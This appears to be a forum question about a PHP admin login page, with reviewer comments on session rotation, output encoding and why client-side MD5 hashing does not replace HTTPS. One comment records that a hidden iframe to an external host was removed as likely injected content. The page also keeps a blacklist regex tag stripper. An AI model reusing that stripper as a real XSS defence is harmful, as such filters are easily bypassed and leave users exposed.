Hey, I have a login form that takes the username and password from the user and submits the form. I'm using Burp Suite to check for threats. When I click the submit button, the password is visible. Is it possible to encrypt the password as soon as it is entered, instead of passing it on when clicking the submit button? Here is my code:
<?php
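session_start();
// Rotate the session id on every load of the login page so that an id the
// browser held before authentication is not the one it holds afterwards.
// The old session record is kept (delete_old_session defaults to false), so
// the previous id stays usable until it expires; consider passing true once
// it is confirmed that no concurrent request of this app relies on the old id.
$old_sessionid = session_id();
session_regenerate_id();
$new_sessionid = session_id();

if( isset($_SESSION['gel']) ) {
    header("Location: admin.php");
    // Stop here: without exit the rest of this script, including the login
    // form below, is still executed and sent along with the redirect.
    exit;
}

if( isset($_POST['submit']) ) {
    require_once "../inc/functions.php";
    // Default missing fields to '' so a tampered POST lacking txtuser/txtpass
    // does not raise an undefined-index notice.
    // NOTE(review): htmlentities() is an output encoder; applying it here
    // alters any password containing &, <, > or quotes before sessionStart()
    // sees it. Left in place because sessionStart() (defined in functions.php,
    // not visible here) may expect the encoded form -- confirm before removing.
    $user = htmlentities(isset($_POST['txtuser']) ? $_POST['txtuser'] : '');
    $pass = htmlentities(isset($_POST['txtpass']) ? $_POST['txtpass'] : '');
    // Compare against '' rather than relying on truthiness, so a username or
    // password of "0" is not treated as empty.
    if($user !== '' && $pass !== ''){
        // $error is assigned here but the page below prints $_REQUEST['error']
        // instead -- verify which of the two is the intended message source.
        $error=sessionStart($user,$pass);
    }else{
        $error = " <p style='color:#FF0000'>Invalid Username or Password</p>";
    }
}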
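/**
 * Strips script/style elements, other HTML tags and SGML declarations out of a string.
 *
 * This is a blacklist tag stripper, not an HTML encoder: the text it returns
 * must still go through htmlspecialchars() when it is echoed into a page.
 *
 * @param string|null $input raw text; null (e.g. a missing request parameter)
 *                           is treated as ''
 * @return string the input with the matched markup removed
 */
function cleanInput($input) {
    // Cast first: preg_replace() on null is deprecated since PHP 8.1 and
    // would fail for a missing $_REQUEST value under strict types.
    $input = (string) $input;
    // Patterns are applied in order. The element-with-content patterns
    // (script, style) must run before the generic tag pattern, otherwise the
    // generic pattern removes the tags first and the element's body survives.
    $search = array(
        '@<\s*script[^>]*?>.*?<\s*/\s*script\s*>@si',    // script elements and their content
        '@<\s*style[^>]*?>.*?<\s*/\s*style\s*>@siU',     // style elements and their content
        '@<![\s\S]*?[ \t\n\r]*>@',                       // <!DOCTYPE ...> / <!-- ... --> declarations
        '/<img[^>]+\>/i',                                // img tags
        '@<\s*[\/\!]*?[^<>]*?>@si',                      // any remaining tag
    );
    return preg_replace($search, '', $input);
}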
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Admin :: Login</title>
<script type="text/javascript" src="md5.js"></script>
<script type="text/javascript" src="login.js"></script>
<link rel="stylesheet" type="text/css" href="admin.css" />
<script type="text/javascript">
<!--
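// Dreamweaver-style client-side form validator. Arguments come in triples:
// (element id, unused, test). test is 'R' (required), contains 'isEmail'
// (basic e-mail check), or anything else (treated as a number test, with an
// optional 'inRange:min:max' bound); a leading 'R' marks the field required.
// Sets document.MM_returnValue to true when no error was found; the submit
// button's onclick returns that flag to allow or block the submit.
// This is a usability aid only: a client can skip this script, so the server
// must validate the same fields regardless.
function MM_validateForm() { //v4.0
  if (document.getElementById) {
    // 'val' is declared here; the original assigned it without 'var' and so
    // leaked it into the global scope. 'arguments' replaces the non-standard
    // MM_validateForm.arguments.
    var i, p, nm, test, num, min, max, val, errors = '', args = arguments;
    for (i = 0; i < (args.length - 2); i += 3) {
      test = args[i + 2];
      val = document.getElementById(args[i]);
      if (val) {
        nm = val.name;
        if ((val = val.value) != "") {
          if (test.indexOf('isEmail') != -1) {
            p = val.indexOf('@');
            if (p < 1 || p == (val.length - 1)) errors += '- ' + nm + ' must contain an e-mail address.\n';
          } else if (test != 'R') {
            num = parseFloat(val);
            // Tests the raw string rather than num, so '12abc' is rejected (kept as in the original).
            if (isNaN(val)) errors += '- ' + nm + ' must contain a number.\n';
            if (test.indexOf('inRange') != -1) {
              p = test.indexOf(':');
              min = test.substring(8, p);
              max = test.substring(p + 1);
              if (num < min || max < num) errors += '- ' + nm + ' must contain a number between ' + min + ' and ' + max + '.\n';
            }
          }
        } else if (test.charAt(0) == 'R') errors += '- ' + args[i] + ' is required.\n';
      }
    }
    if (errors) alert('The following error(s) occurred:\n' + errors);
    document.MM_returnValue = (errors == '');
  }
}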
//-->
</script>
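</head>
<body>
<?php /* A hidden <iframe> pointing at an external host (b8e.at:8080) was here.
         It serves no purpose on the login page, and a hidden third-party frame
         on an admin page is a common indicator of injected content, so it has
         been removed. Check the deployed files, the web server logs and the
         other pages of the site for the same insert. This note is a PHP
         comment so that it is not sent to the browser. */ ?>
<div class="container">
<div class="wrap">
<div class="header">
<img class ="head_logo" src="../images/logo.jpg" alt="Goavernment Logo">
<div class ="head_name">
DIRECTORATE OF PANCHAYATS
</div>
</div>
<div align="center" class="outerbox">
<div align="center" class="loginbox">
<p style="font-family:Tahoma"><strong>Administrator Login</strong></p>
<?php /* The error text comes straight from the request and is reflected into
         the page, so it is HTML-encoded at this output point; cleanInput()
         only strips tags and is not an encoder. The isset() guard avoids a
         notice when no error parameter is present. */ ?>
<?= isset($_REQUEST['error']) ? htmlspecialchars(cleanInput($_REQUEST['error']), ENT_QUOTES, 'UTF-8') : '' ?>
<form id="myform" name="myform" method="post" action="index.php">
<table width="250" border="0">
<tr>
<td align="left"><strong>User</strong></td>
<td > <input type="text" name="txtuser" id="User" /></td>
</tr>
<tr>
<td align="left"><strong>Password</strong></td>
<?php /* The password is posted as entered. Protecting it from an interposed
         proxy is the job of HTTPS for the whole page; hashing it in the
         browser (md5.js is loaded in the head) does not achieve that, because
         the hash then becomes the credential the server accepts. */ ?>
<td ><input type="password" name="txtpass" id="Password" /></td>
</tr>
</table>
<br />
<input name="submit" type="submit" onclick="MM_validateForm('User','','R','Password','','R');return document.MM_returnValue" value="Login" />
</form>
</div>
</div>
</div><br>
</div>
<?php /* A stray closing </form> tag was here; the form is already closed above. */ ?>
</body>
</html>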